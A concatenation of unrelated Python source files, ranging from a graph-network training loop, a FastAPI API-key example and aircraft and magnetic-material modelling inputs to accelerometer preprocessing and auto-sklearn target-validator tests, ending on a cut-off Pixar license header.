loss = train(model)
# acc = test(model, test_data, criterion)
test_loss = test(model)
train_losses.append(loss.item())
val_losses.append(test_loss.item())
print(f'Epoch: {epoch:02d}, Loss: {loss:.4f}')
print(model)
results = model(data.x, data.edge_index)
results = results.detach().numpy().reshape(-1)
print(results)
# plt.title("Predicted/ G-truth")
plt.plot(results, label="pred")
plt.plot(data.y.view(-1, 1), label="g_truth", alpha=0.5)
plt.title(filename.split('/')[-1].strip('.csv'))
plt.xlabel("timestep")
plt.ylabel("delta_p")
plt.legend()
# plt.savefig('foo.png')
plt.show()
plt.figure(figsize=(10, 5))
plt.title("Training and Validation Loss")
plt.plot(val_losses, label="val")
plt.plot(train_losses, label="train")
plt.xlabel("iterations")
plt.ylabel("Loss")
plt.legend()
plt.show()
print('------------------------------End Pipeline-----------------------------')
|
from fastapi import FastAPI, Depends
import fastapi_simple_security
app = FastAPI()
@app.get("/unsecured")
async def unsecured_endpoint():
return {"message": "This is an unsecured endpoint"}
@app.get("/secure", dependencies=[Depends(fastapi_simple_security.api_key_security)])
async def secure_endpoint():
return {"message": "This is a secure endpoint"}
app.include_router(
fastapi_simple_security.api_key_router, prefix="/auth", tags=["_auth"]
)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from ceasiompy.utils.moduleinterfaces import CPACSInOut, AIRCRAFT_XPATH
# ===== RCE integration =====
RCE = {
"name": "PyTornado",
"description": "Wrapper module for PyTornado",
"exec": "pwd\npython runpytornado.py",
"author": "Aaron Dettmann",
"email": "dettmann@kth.se",
}
REFS_XPATH = AIRCRAFT_XPATH + '/model/reference'
WING_XPATH = AIRCRAFT_XPATH + '/model/wings'
XPATH_PYTORNADO = '/cpacs/toolspecific/pytornado'
# ===== CPACS inputs and outputs =====
cpacs_inout = CPACSInOut()
#===== Input =====
cpacs_inout.add_input(
var_name='',
var_type=list,
default_value=None,
unit=None,
descr="Name of the aero map to evaluate",
xpath=XPATH_PYTORNADO + '/aeroMapUID',
gui=True,
gui_name='__AEROMAP_SELECTION',
gui_group=None,
)
cpacs_inout.add_input(
var_name='delete_old_wkdirs',
var_type=bool,
default_value=False,
unit=None,
descr="Delete old PyTornado working directories (if existent)",
xpath=XPATH_PYTORNADO + '/deleteOldWKDIRs',
gui=False,
gui_name='Delete',
gui_group='Delete old working directories',
)
# ----- Discretisation -----
# TO BE IMPROVED IN NEW PYTORNADO VERSION
cpacs_inout.add_input(
var_name='',
var_type=int,
default_value=20,
unit=None,
descr="The number of chordwise VLM panels",
xpath=XPATH_PYTORNADO + '/vlm_autopanels_c',
gui=True,
gui_name='Number of chordwise panels',
gui_group='Dicretisation',
)
cpacs_inout.add_input(
var_name='',
var_type=int,
default_value=5,
unit=None,
descr="The number of spanwise VLM panels",
xpath=XPATH_PYTORNADO + '/vlm_autopanels_s',
gui=True,
gui_name='Number of spanwise panels',
gui_group='Dicretisation',
)
# ----- Plots -----
for plot_name in ['lattice', 'geometry', 'results', 'matrix_downwash']:
for action in ['save', 'show']:
cpacs_inout.add_input(
var_name='',
var_type=bool,
default_value=False,
unit=None,
descr=f"{action.capitalize()} a {plot_name.replace('_', ' ')} plot (program will pause to show)",
xpath=XPATH_PYTORNADO + f'/plot/{plot_name}/{action}',
gui=True,
gui_name=f'{action.capitalize()} plot',
gui_group=f"{plot_name.capitalize().replace('_', ' ')} plot",
)
# TODO: add optional settings
# ----- Save other results -----
for save_name in ['global', 'panelwise', 'aeroperformance']:
cpacs_inout.add_input(
var_name='',
var_type=bool,
default_value=False,
unit=None,
descr=f"Save PyTornado '{save_name}' results",
xpath=XPATH_PYTORNADO + f'/save_results/{save_name}',
gui=True,
gui_name=f'Save {save_name.capitalize()}',
gui_group=f'Save CPACS external results',
)
cpacs_inout.add_input(
var_name='check_extract_loads',
var_type=bool,
default_value=False,
unit='1',
descr='Option to extract loads from results',
xpath=XPATH_PYTORNADO + '/save_results/extractLoads',
gui=True,
gui_name='Extract loads',
gui_group=f'Save CPACS external results',
)
cpacs_inout.add_input(
var_name='x_CG',
default_value=None,
unit='m',
descr='Centre of gravity (x-coordinate)',
xpath=REFS_XPATH + '/point/x'
)
cpacs_inout.add_input(
var_name='y_CG',
default_value=None,
unit='m',
descr='Centre of gravity (y-coordinate)',
xpath=REFS_XPATH + '/point/x'
)
cpacs_inout.add_input(
var_name='z_CG',
default_value=None,
unit='m',
descr='Centre of gravity (z-coordinate)',
xpath=REFS_XPATH + '/point/x'
)
cpacs_inout.add_input(
var_name='area',
default_value=None,
unit='m^2',
descr='Reference area for force and moment coefficients',
xpath=REFS_XPATH + '/area'
)
cpacs_inout.add_input(
var_name='length',
default_value=None,
unit='m',
descr='Reference length for force and moment coefficients',
xpath=REFS_XPATH + '/length'
)
cpacs_inout.add_input(
var_name='wing',
default_value=None,
unit='-',
descr='Aircraft lifting surface',
xpath=WING_XPATH,
)
# ----- Output -----
cpacs_inout.add_output(
var_name='aeromap_PyTornado', # name to change...
# var_type=CPACS_aeroMap, # no type pour output, would it be useful?
default_value=None,
unit='-',
descr='aeroMap with aero coefficients calculated by PyTornado',
xpath='/cpacs/vehicles/aircraft/model/analyses/aeroPerformance/aeroMap[i]/aeroPerformanceMap',
)
|
# -*- coding: utf-8 -*-
# create MC/MCV files from curve data
#
import femagtools
import logging
import os
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(message)s')
mcvData = [
dict(curve=[dict(
bi=[0.0, 0.09, 0.179, 0.267, 0.358,
0.45, 0.543, 0.6334, 0.727,
0.819, 0.9142, 1.0142, 1.102,
1.196, 1.314, 1.3845, 1.433,
1.576, 1.677, 1.745, 1.787,
1.81, 1.825, 1.836],
hi=[0.0, 22.16, 31.07, 37.25, 43.174,
49.54, 56.96, 66.11, 78.291,
95, 120.64, 164.6, 259.36,
565.86, 1650.26, 3631.12, 5000, 10000,
15000, 20000, 25000, 30000, 35000, 40000])],
desc=u"Demo Steel",
name='M270-35A',
ch=4.0,
cw_freq=2.0,
cw=1.68),
dict(curve=[{"angle": 0.0,
"bi": [0.0, 0.5001193881034851, 0.6001256704330444,
0.700133204460144, 0.8001407384872437,
0.9001495242118835, 1.0001596212387085,
1.1001709699630737, 1.2001848220825195,
1.3002337217330933, 1.4003480672836304,
1.500654697418213, 1.6016123294830322,
1.7040778398513794, 1.8085501194000244,
1.9156187772750854, 1.9730873107910156],
"hi": [0.0, 95.0, 100.0, 106.0, 112.0, 119.0, 127.0,
136.0, 147.0, 186.0, 277.0, 521.0, 1283.0,
3245.0, 6804.0, 12429.0, 16072.6748046875]},
{"angle": 90.0,
"bi": [0.0, 0.5002199411392212, 0.6002413034439087,
0.7002626061439514, 0.8002877831459045,
0.9003154039382935, 1.0003480911254883,
1.1003907918930054, 1.2004486322402954,
1.3005428314208984, 1.4007363319396973,
1.5012717247009277, 1.6028035879135132,
1.7061727046966553, 1.8115723133087158,
1.918825626373291, 1.9763903617858887],
"hi": [0.0, 175.0, 192.0, 209.0, 229.0, 251.0,
277.0, 311.0, 357.0, 432.0, 586.0,
1012.0, 2231.0, 4912.0, 9209.0, 14981.0,
18718.376953125]}],
ctype=femagtools.mcv.ORIENT_CRV,
desc="Magnetic Curve",
rho=7.65,
bsat=0.0,
name="V800-50A_aniso",
cw=0.0,
cw_freq=0.0,
fillfac=1.0,
bref=0.0,
b_coeff=0.0,
fe_sat_mag=2.15,
ch_freq=0.0,
remz=0.0,
Bo=1.5,
ch=0.0,
fo=50.0)
]
userdir = os.path.expanduser('~')
workdir = os.path.join(userdir, 'femag')
try:
os.makedirs(workdir)
except OSError:
pass
mcv = femagtools.mcv.MagnetizingCurve(mcvData)
for m in mcvData:
mcv.writefile(m['name'], workdir)
|
"""
Implement numerical maxabs scaler.
"""
from typing import Any, Union
import dask.dataframe as dd
class MaxAbsScaler:
"""Max Absolute Value Scaler for scaling numerical values
Attributes:
name
Name of scaler
maxabs
Max absolute value of provided data column
"""
def __init__(self) -> None:
"""
This function initiate numerical scaler.
"""
self.name = "maxabsScaler"
self.maxabs = 0
def fit(self, col_df: dd.Series) -> Any:
"""
Extract max absolute value for MaxAbs Scaler according to the provided column.
Parameters
----------
col_df
Provided data column.
"""
self.maxabs = max(abs(col_df.drop_duplicates().values.tolist()))
return self
def transform(self, col_df: dd.Series) -> dd.Series:
"""
Transform the provided data column with the extracted max absolute value.
Parameters
----------
col_df
Provided data column.
"""
result = col_df.map(self.compute_val)
return result
def fit_transform(self, col_df: dd.Series) -> dd.Series:
"""
Extract max absolute value for MaxAbs Scaler according to the provided column.
Transform the provided data column with the extracted max absolute value.
Parameters
----------
col_df
Data column.
"""
return self.fit(col_df).transform(col_df)
def compute_val(self, val: Union[int, float]) -> Union[int, float]:
"""
Compute scaling value of provided value with fitted max absolute value.
Parameters
----------
val
Value should be scaled.
"""
return val / self.maxabs
|
"""
This module provides versioning informations.
from SlackLogger.version import get_version
__version__ = get_version()
"""
VERSION = '2.5.0'
def get_version():
"""
Return package version value.
:return: VERSION value, obviously
:rtype: string
"""
return VERSION
|
import os
import unittest
import apiritif
from apiritif.thread import get_index
reader_1 = apiritif.CSVReaderPerThread(os.path.join(os.path.dirname(__file__), "data/source0.csv"))
def log_it(name, target, data):
log_line = "%s[%s]-%s. %s:%s:%s\n" % (get_index(), target, name, data["name"], data["pass"], data["age"])
with apiritif.transaction(log_line): # write log_line into report file for checking purposes
pass
def setup(): # setup_module
target = str(get_index())
vars = {
'name': 'nobody',
'age': 'a'
}
reader_1.read_vars()
vars.update(reader_1.get_vars())
apiritif.put_into_thread_store(vars, target)
# class Test0(unittest.TestCase):
# def test_00(self):
# log_it("00", reader_1.get_vars())
class Test1(unittest.TestCase):
def setUp(self):
self.vars, self.target = apiritif.get_from_thread_store()
def test_10(self):
log_it("10", self.target, self.vars)
self.vars["name"] += "+"
def test_11(self):
log_it("11", self.target, self.vars)
|
# Copyright 2020 Supun Nakandala. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import time
import json
import pandas as pd
import numpy as np
from datetime import timedelta, datetime
import argparse
def filter_labels(x):
if len(set(x)) == 1:
return x[0]
else:
return -1
def preprocess_raw_data(gt3x_dir, activpal_dir, user_id, gt3x_frequency, label_map):
if activpal_dir is not None:
# Read activepal file
def date_parser(x): return pd.datetime.strptime(x, '%Y-%m-%d %H:%M:%S')
df_ap = pd.read_csv(os.path.join(activpal_dir, str(user_id)+'.csv'),
parse_dates=['StartTime', 'EndTime'], date_parser=date_parser, usecols=['StartTime', 'EndTime', 'Behavior'])
# Flatten the activepal file to 1 second resolution
data = []
prev_end_time = None
segment_no = 0
for i in range(len(df_ap)):
x = df_ap.iloc[i]
if not (prev_end_time is None) and (x['StartTime']-prev_end_time).total_seconds() > 1:
segment_no += 1
for i in range(int((x['EndTime']-x['StartTime']).total_seconds() + 1)):
data.append([segment_no, x['StartTime'] +
timedelta(seconds=i), label_map[x['Behavior']]])
prev_end_time = x['EndTime']
df_ap = pd.DataFrame(data)
df_ap.columns = ['Segment', 'Time', 'Behavior']
else:
df_ap = None
# Find activegraph start time
with open(os.path.join(gt3x_dir, str(user_id)+'.csv'), 'r') as fp:
acc_start_time = ''
count = 0
for l in fp:
if count == 2:
acc_start_time = l.split(' ')[2].strip()
elif count == 3:
acc_start_time = l.split(' ')[2].strip() + ' ' + acc_start_time
break
count += 1
# Read activegraph file
df_acc = pd.read_csv(os.path.join(gt3x_dir, str(user_id)+'.csv'), skiprows=10)
# Aggregate at 1 second resolution
data = []
begin_time = datetime.strptime(acc_start_time, '%m/%d/%Y %H:%M:%S')
for i in range(0, len(df_acc), gt3x_frequency):
x = np.array(df_acc.iloc[i:i+gt3x_frequency])
data.append([begin_time + timedelta(seconds=i//gt3x_frequency), x])
df_acc = pd.DataFrame(data)
df_acc.columns = ['Time', 'Accelerometer']
# Create joined table
if df_ap is not None:
df = pd.merge(df_acc, df_ap, on='Time')
df['User'] = user_id
df = df[['User', 'Segment', 'Time', 'Accelerometer', 'Behavior']]
else:
df = df_acc
df['User'] = user_id
df = df[['User', 'Time', 'Accelerometer']]
return df
def extract_windows(original_df, window_size):
df = []
for (user, segment), group in original_df.groupby(["User", "Segment"]):
group.index = group["Time"]
group = group[~group.index.duplicated(keep='first')]
# [:-1] becuase the last row may not necessarily have window_size seconds of data
temp = group["Accelerometer"].resample(str(window_size)+'s', base=group.iloc[0][2].second).apply(lambda x: np.vstack(x.values.tolist()))[:-1]
temp2 = group["Time"].resample(str(window_size)+'s', base=group.iloc[0][2].second).apply(lambda x: x.values.tolist()[0])
temp = pd.concat([temp, temp2], axis=1)[:-1]
if 'Behavior' in original_df.columns:
temp2 = group["Behavior"].resample(str(window_size)+'s', base=group.iloc[0][2].second).apply(lambda x: filter_labels(x.values.tolist()))
temp = pd.concat([temp, temp2], axis=1)[:-1]
# Remove time windows with more than one label
temp = temp[temp["Behavior"] >= 0]
temp["User"] = user
temp["Segment"] = segment
if 'Behavior' in original_df.columns:
temp = temp[["User", "Segment", "Time", "Accelerometer", "Behavior"]]
temp = temp[temp["Behavior"] >= 0]
else:
temp = temp[["User", "Segment", "Time", "Accelerometer"]]
df.append(temp)
return pd.concat(df)
def extract_features(gt3x_dir, activpal_dir, pre_processed_dir, user_id, window_size, gt3x_frequency, label_map):
df = preprocess_raw_data(gt3x_dir, activpal_dir, user_id, gt3x_frequency, label_map)
if activpal_dir is None:
df['Segment'] = 0
df = df[['User', 'Segment', 'Time', 'Accelerometer']]
# We use a window of 3
df = extract_windows(df, window_size=window_size)
# Write the joined table
df.to_pickle(os.path.join(pre_processed_dir, str(user_id)+'.bin'))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Argument parser for preprocessing the input data.')
optional_arguments = parser._action_groups.pop()
required_arguments = parser.add_argument_group('required arguments')
required_arguments.add_argument('--gt3x-dir', help='GT3X data directory', required=True)
required_arguments.add_argument('--pre-processed-dir', help='Pre-processed data directory', required=True)
optional_arguments.add_argument('--activpal-dir', help='ActivPAL data directory', default=None, required=False)
optional_arguments.add_argument('--window-size', help='Window size in seconds on which the predictions to be made', default=3, type=int, required=False)
optional_arguments.add_argument('--gt3x-frequency', help='GT3X device frequency in Hz', default=30, type=int, required=False)
optional_arguments.add_argument('--activpal-label-map', help='ActivPal label vocabulary', default='{"sitting": 0, "standing": 1, "stepping": 2}', required=False)
optional_arguments.add_argument('--silent', help='Whether to hide info messages', default=False, required=False, action='store_true')
parser._action_groups.append(optional_arguments)
args = parser.parse_args()
if not os.path.exists(args.pre_processed_dir):
os.makedirs(args.pre_processed_dir)
label_map = json.loads(args.activpal_label_map)
for fname in os.listdir(args.gt3x_dir):
if fname.endswith('.csv'):
user_id = fname.split(".")[0]
extract_features(args.gt3x_dir, args.activpal_dir, args.pre_processed_dir, user_id, args.window_size, args.gt3x_frequency, label_map)
if not args.silent:
print('Completed pre-processing data for subject: {}'.format(user_id))
|
import numpy as np
import pandas as pd
import pytest
from pandas.api.types import is_numeric_dtype
from scipy import sparse
import sklearn.datasets
import sklearn.model_selection
from sklearn.utils.multiclass import type_of_target
from autosklearn.data.target_validator import TargetValidator
# Fixtures to be used in this class. By default all elements have 100 datapoints
@pytest.fixture
def input_data_targettest(request):
if request.param == 'series_binary':
return pd.Series([1, -1, -1, 1])
elif request.param == 'series_multiclass':
return pd.Series([1, 0, 2])
elif request.param == 'series_multilabel':
return pd.Series([[1, 0], [0, 1]])
elif request.param == 'series_continuous':
return pd.Series([0.1, 0.6, 0.7])
elif request.param == 'series_continuous-multioutput':
return pd.Series([[1.5, 2.0], [3.0, 1.6]])
elif request.param == 'pandas_binary':
return pd.DataFrame([1, -1, -1, 1])
elif request.param == 'pandas_multiclass':
return pd.DataFrame([1, 0, 2])
elif request.param == 'pandas_multilabel':
return pd.DataFrame([[1, 0], [0, 1]])
elif request.param == 'pandas_continuous':
return pd.DataFrame([0.1, 0.6, 0.7])
elif request.param == 'pandas_continuous-multioutput':
return pd.DataFrame([[1.5, 2.0], [3.0, 1.6]])
elif request.param == 'numpy_binary':
return np.array([1, -1, -1, 1])
elif request.param == 'numpy_multiclass':
return np.array([1, 0, 2])
elif request.param == 'numpy_multilabel':
return np.array([[1, 0], [0, 1]])
elif request.param == 'numpy_continuous':
return np.array([0.1, 0.6, 0.7])
elif request.param == 'numpy_continuous-multioutput':
return np.array([[1.5, 2.0], [3.0, 1.6]])
elif request.param == 'list_binary':
return [1, -1, -1, 1]
elif request.param == 'list_multiclass':
return [1, 0, 2]
elif request.param == 'list_multilabel':
return [[0, 1], [1, 0]]
elif request.param == 'list_continuous':
return [0.1, 0.6, 0.7]
elif request.param == 'list_continuous-multioutput':
return [[1.5, 2.0], [3.0, 1.6]]
elif 'openml' in request.param:
_, openml_id = request.param.split('_')
X, y = sklearn.datasets.fetch_openml(data_id=int(openml_id),
return_X_y=True, as_frame=True)
if len(y.shape) > 1 and y.shape[1] > 1 and np.any(y.eq('TRUE').any(1).to_numpy()):
# This 'if' is only asserted for multi-label data
# Force the downloaded data to be interpreted as multilabel
y = y.dropna()
y.replace('FALSE', 0, inplace=True)
y.replace('TRUE', 1, inplace=True)
y = y.astype(np.int)
return y
elif 'sparse' in request.param:
# We expect the names to be of the type sparse_csc_nonan
sparse_, type_, nan_ = request.param.split('_')
if 'nonan' in nan_:
data = np.ones(3)
else:
data = np.array([1, 2, np.nan])
# Then the type of sparse
if 'csc' in type_:
return sparse.csc_matrix(data)
elif 'csr' in type_:
return sparse.csr_matrix(data)
elif 'coo' in type_:
return sparse.coo_matrix(data)
elif 'bsr' in type_:
return sparse.bsr_matrix(data)
elif 'lil' in type_:
return sparse.lil_matrix(data)
elif 'dok' in type_:
return sparse.dok_matrix(np.vstack((data, data, data)))
elif 'dia' in type_:
return sparse.dia_matrix(np.vstack((data, data, data)))
else:
ValueError("Unsupported indirect fixture {}".format(request.param))
else:
ValueError("Unsupported indirect fixture {}".format(request.param))
# Actual checks for the targets
@pytest.mark.parametrize(
'input_data_targettest',
(
'series_binary',
'series_multiclass',
'series_continuous',
'pandas_binary',
'pandas_multiclass',
'pandas_multilabel',
'pandas_continuous',
'pandas_continuous-multioutput',
'numpy_binary',
'numpy_multiclass',
'numpy_multilabel',
'numpy_continuous',
'numpy_continuous-multioutput',
'list_binary',
'list_multiclass',
'list_multilabel',
'list_continuous',
'list_continuous-multioutput',
'sparse_bsr_nonan',
'sparse_coo_nonan',
'sparse_csc_nonan',
'sparse_csr_nonan',
'sparse_lil_nonan',
'openml_204',
),
indirect=True
)
def test_targetvalidator_supported_types_noclassification(input_data_targettest):
validator = TargetValidator(is_classification=False)
validator.fit(input_data_targettest)
transformed_y = validator.transform(input_data_targettest)
if sparse.issparse(input_data_targettest):
assert sparse.issparse(transformed_y)
else:
assert isinstance(transformed_y, np.ndarray)
epected_shape = np.shape(input_data_targettest)
if len(epected_shape) > 1 and epected_shape[1] == 1:
# The target should have (N,) dimensionality instead of (N, 1)
epected_shape = (epected_shape[0], )
assert epected_shape == np.shape(transformed_y)
assert np.issubdtype(transformed_y.dtype, np.number)
assert validator._is_fitted
# Because there is no classification, we do not expect a encoder
assert validator.encoder is None
if hasattr(input_data_targettest, "iloc"):
np.testing.assert_array_equal(
np.ravel(input_data_targettest.to_numpy()),
np.ravel(transformed_y)
)
elif sparse.issparse(input_data_targettest):
np.testing.assert_array_equal(
np.ravel(input_data_targettest.todense()),
np.ravel(transformed_y.todense())
)
else:
np.testing.assert_array_equal(
np.ravel(np.array(input_data_targettest)),
np.ravel(transformed_y)
)
@pytest.mark.parametrize(
'input_data_targettest',
(
'series_binary',
'series_multiclass',
'pandas_binary',
'pandas_multiclass',
'numpy_binary',
'numpy_multiclass',
'list_binary',
'list_multiclass',
'sparse_bsr_nonan',
'sparse_coo_nonan',
'sparse_csc_nonan',
'sparse_csr_nonan',
'sparse_lil_nonan',
'openml_2',
),
indirect=True
)
def test_targetvalidator_supported_types_classification(input_data_targettest):
validator = TargetValidator(is_classification=True)
validator.fit(input_data_targettest)
transformed_y = validator.transform(input_data_targettest)
if sparse.issparse(input_data_targettest):
assert sparse.issparse(transformed_y)
else:
assert isinstance(transformed_y, np.ndarray)
epected_shape = np.shape(input_data_targettest)
if len(epected_shape) > 1 and epected_shape[1] == 1:
# The target should have (N,) dimensionality instead of (N, 1)
epected_shape = (epected_shape[0], )
assert epected_shape == np.shape(transformed_y)
assert np.issubdtype(transformed_y.dtype, np.number)
assert validator._is_fitted
# Because there is no classification, we do not expect a encoder
if not sparse.issparse(input_data_targettest):
assert validator.encoder is not None
# The encoding should be per column
if len(transformed_y.shape) == 1:
assert np.min(transformed_y) == 0
assert np.max(transformed_y) == len(np.unique(transformed_y)) - 1
else:
for col in range(transformed_y.shape[1]):
assert np.min(transformed_y[:, col]) == 0
assert np.max(transformed_y[:, col]) == len(np.unique(transformed_y[:, col])) - 1
# Make sure we can perform inverse transform
y_inverse = validator.inverse_transform(transformed_y)
if hasattr(input_data_targettest, 'dtype'):
# In case of numeric, we need to make sure dtype is preserved
if is_numeric_dtype(input_data_targettest.dtype):
assert y_inverse.dtype == input_data_targettest.dtype
# Then make sure every value is properly inverse-transformed
np.testing.assert_array_equal(np.array(y_inverse), np.array(input_data_targettest))
elif hasattr(input_data_targettest, 'dtypes'):
if is_numeric_dtype(input_data_targettest.dtypes[0]):
assert y_inverse.dtype == input_data_targettest.dtypes[0]
# Then make sure every value is properly inverse-transformed
np.testing.assert_array_equal(np.array(y_inverse),
# pandas is always (N, 1) but targets are ravel()
input_data_targettest.to_numpy().reshape(-1))
else:
# Sparse is not encoded, mainly because the sparse data is expected
# to be numpy of numerical type -- which currently does not require encoding
np.testing.assert_array_equal(
np.ravel(input_data_targettest.todense()),
np.ravel(transformed_y.todense())
)
@pytest.mark.parametrize(
'input_data_targettest',
(
'series_binary',
'pandas_binary',
'numpy_binary',
'list_binary',
'openml_1066',
),
indirect=True
)
def test_targetvalidator_binary(input_data_targettest):
assert type_of_target(input_data_targettest) == 'binary'
validator = TargetValidator(is_classification=True)
# Test the X_test also!
validator.fit(input_data_targettest, input_data_targettest)
transformed_y = validator.transform(input_data_targettest)
assert type_of_target(transformed_y) == 'binary'
@pytest.mark.parametrize(
'input_data_targettest',
(
'series_multiclass',
'pandas_multiclass',
'numpy_multiclass',
'list_multiclass',
'openml_54',
),
indirect=True
)
def test_targetvalidator_multiclass(input_data_targettest):
assert type_of_target(input_data_targettest) == 'multiclass'
validator = TargetValidator(is_classification=True)
# Test the X_test also!
validator.fit(input_data_targettest, input_data_targettest)
transformed_y = validator.transform(input_data_targettest)
assert type_of_target(transformed_y) == 'multiclass'
@pytest.mark.parametrize(
'input_data_targettest',
(
'pandas_multilabel',
'numpy_multilabel',
'list_multilabel',
'openml_40594',
),
indirect=True
)
def test_targetvalidator_multilabel(input_data_targettest):
assert type_of_target(input_data_targettest) == 'multilabel-indicator'
validator = TargetValidator(is_classification=True)
# Test the X_test also!
validator.fit(input_data_targettest, input_data_targettest)
transformed_y = validator.transform(input_data_targettest)
assert type_of_target(transformed_y) == 'multilabel-indicator'
@pytest.mark.parametrize(
'input_data_targettest',
(
'series_continuous',
'pandas_continuous',
'numpy_continuous',
'list_continuous',
'openml_531',
),
indirect=True
)
def test_targetvalidator_continuous(input_data_targettest):
assert type_of_target(input_data_targettest) == 'continuous'
validator = TargetValidator(is_classification=False)
# Test the X_test also!
validator.fit(input_data_targettest, input_data_targettest)
transformed_y = validator.transform(input_data_targettest)
assert type_of_target(transformed_y) == 'continuous'
@pytest.mark.parametrize(
'input_data_targettest',
(
'pandas_continuous-multioutput',
'numpy_continuous-multioutput',
'list_continuous-multioutput',
'openml_41483',
),
indirect=True
)
def test_targetvalidator_continuous_multioutput(input_data_targettest):
assert type_of_target(input_data_targettest) == 'continuous-multioutput'
validator = TargetValidator(is_classification=False)
# Test the X_test also!
validator.fit(input_data_targettest, input_data_targettest)
transformed_y = validator.transform(input_data_targettest)
assert type_of_target(transformed_y) == 'continuous-multioutput'
@pytest.mark.parametrize(
'input_data_targettest',
(
'series_binary',
'pandas_binary',
'numpy_binary',
'list_binary',
),
indirect=True
)
def test_targetvalidator_fitontypeA_transformtypeB(input_data_targettest):
"""
Check if we can fit in a given type (numpy) yet transform
if the user changes the type (pandas then)
This is problematic only in the case we create an encoder
"""
validator = TargetValidator(is_classification=True)
validator.fit(input_data_targettest)
if isinstance(input_data_targettest, pd.DataFrame):
complementary_type = input_data_targettest.to_numpy()
elif isinstance(input_data_targettest, pd.Series):
complementary_type = pd.DataFrame(input_data_targettest)
elif isinstance(input_data_targettest, np.ndarray):
complementary_type = pd.DataFrame(input_data_targettest)
elif isinstance(input_data_targettest, list):
complementary_type = pd.DataFrame(input_data_targettest)
validator.transform(complementary_type)
@pytest.mark.parametrize(
'input_data_targettest',
(
'series_multilabel',
'series_continuous-multioutput',
),
indirect=True
)
def test_type_of_target_unsupported(input_data_targettest):
"""
Makes sure we raise a proper message to the user,
when providing not supported data input
"""
validator = TargetValidator()
with pytest.raises(ValueError, match=r"legacy multi-.* data representation."):
validator.fit(input_data_targettest)
def test_target_unsupported():
"""
Makes sure we raise a proper message to the user,
when providing not supported data input
"""
validator = TargetValidator(is_classification=True)
with pytest.raises(ValueError, match=r"The dimensionality of the train and test targets"):
validator.fit(
np.array([[0, 1, 0], [0, 1, 1]]),
np.array([[0, 1, 0, 0], [0, 1, 1, 1]]),
)
with pytest.raises(ValueError, match=r"Train and test targets must both have the same dtypes"):
validator.fit(
pd.DataFrame({'a': [1, 2, 3]}),
pd.DataFrame({'a': [True, False, False]}),
)
with pytest.raises(ValueError, match=r"Provided targets are not supported.*"):
validator.fit(
np.array([[0, 1, 2], [0, 3, 4]]),
np.array([[0, 1, 2, 5], [0, 3, 4, 6]]),
)
with pytest.raises(ValueError, match="Train and test targets must both have the same"):
validator.fit(
pd.DataFrame({'string': ['foo']}),
pd.DataFrame({'int': [1]}),
)
with pytest.raises(ValueError, match=r"Auto-sklearn only supports Numpy arrays, .*"):
validator.fit({'input1': 1, 'input2': 2})
with pytest.raises(ValueError, match=r"arget values cannot contain missing/NaN values"):
validator.fit(np.array([np.nan, 1, 2]))
with pytest.raises(ValueError, match=r"arget values cannot contain missing/NaN values"):
validator.fit(sparse.csr_matrix(np.array([1, 2, np.nan])))
with pytest.raises(ValueError, match=r"Cannot call transform on a validator that is not fit"):
validator.transform(np.array([1, 2, 3]))
with pytest.raises(ValueError, match=r"Cannot call inverse_transform on a validator that is"):
validator.inverse_transform(np.array([1, 2, 3]))
with pytest.raises(ValueError, match=r"Multi-dimensional classification is not yet supported"):
validator._fit(np.array([[1, 2, 3], [1, 5, 6]]))
# Dia/ DOK are not supported as type of target makes calls len on the array
# which causes TypeError: len() of unsized object. Basically, sparse data as
# multi-label is the only thing that makes sense in this format.
with pytest.raises(ValueError, match=r"The provided data could not be interpreted by Sklearn"):
validator.fit(sparse.dia_matrix(np.array([1, 2, 3])))
validator.fit(np.array([[0, 1, 0], [0, 1, 1]]))
with pytest.raises(ValueError, match=r"Number of outputs changed from"):
validator.fit(np.array([0, 1, 0]))
def test_targetvalidator_inversetransform():
"""
Test that the encoding/decoding works in 1D
"""
validator = TargetValidator(is_classification=True)
validator.fit(
pd.DataFrame(data=['a', 'a', 'b', 'c', 'a'], dtype='category'),
)
y = validator.transform(
pd.DataFrame(data=['a', 'a', 'b', 'c', 'a'], dtype='category'),
)
np.testing.assert_array_almost_equal(np.array([0, 0, 1, 2, 0]), y)
y_decoded = validator.inverse_transform(y)
assert ['a', 'a', 'b', 'c', 'a'] == y_decoded.tolist()
assert validator.classes_.tolist() == ['a', 'b', 'c']
validator = TargetValidator(is_classification=True)
multi_label = pd.DataFrame(
np.array([[1, 0, 0, 1], [0, 0, 1, 1], [0, 0, 0, 0]]),
dtype=bool
)
validator.fit(multi_label)
y = validator.transform(multi_label)
y_decoded = validator.inverse_transform(y)
np.testing.assert_array_almost_equal(y, y_decoded)
# Multilabel classification is not encoded
# For this reason, classes_ attribute does not contain a class
np.testing.assert_array_almost_equal(validator.classes_, np.array([]))
# Actual checks for the targets
@pytest.mark.parametrize(
'input_data_targettest',
(
'series_binary',
'series_multiclass',
'pandas_binary',
'pandas_multiclass',
'numpy_binary',
'numpy_multiclass',
'list_binary',
'list_multiclass',
),
indirect=True
)
def test_unknown_categories_in_targets(input_data_targettest):
validator = TargetValidator(is_classification=True)
validator.fit(input_data_targettest)
# Add an extra category
if isinstance(input_data_targettest, list):
input_data_targettest.append(input_data_targettest[-1] + 5000)
elif isinstance(input_data_targettest, (pd.DataFrame, pd.Series)):
input_data_targettest.iloc[-1] = 5000
elif isinstance(input_data_targettest, np.ndarray):
input_data_targettest[-1] = 5000
x_t = validator.transform(input_data_targettest)
assert x_t[-1].item(0) == -1
def test_is_single_column_target():
validator = TargetValidator(is_classification=True)
validator.fit(np.array([1, 2, 3, 4]))
assert validator.is_single_column_target()
validator = TargetValidator(is_classification=True)
validator.fit(np.array([[1, 0, 1, 0], [1, 1, 1, 1]]))
assert not validator.is_single_column_target()
|
#
# Copyright 2017 Pixar Animation Studios
#
# Licensed under the Apache License, Version 2.0 (the "Apache License")
# with the following modification; you may not use this file except in
# compliance with the Apache License and the following modification to it:
# Section 6. Trademarks. is deleted and replaced with:
#
# 6. Trademarks. This License does not grant permission to use the trade
# names, trademarks, service marks, or product names of the Licensor
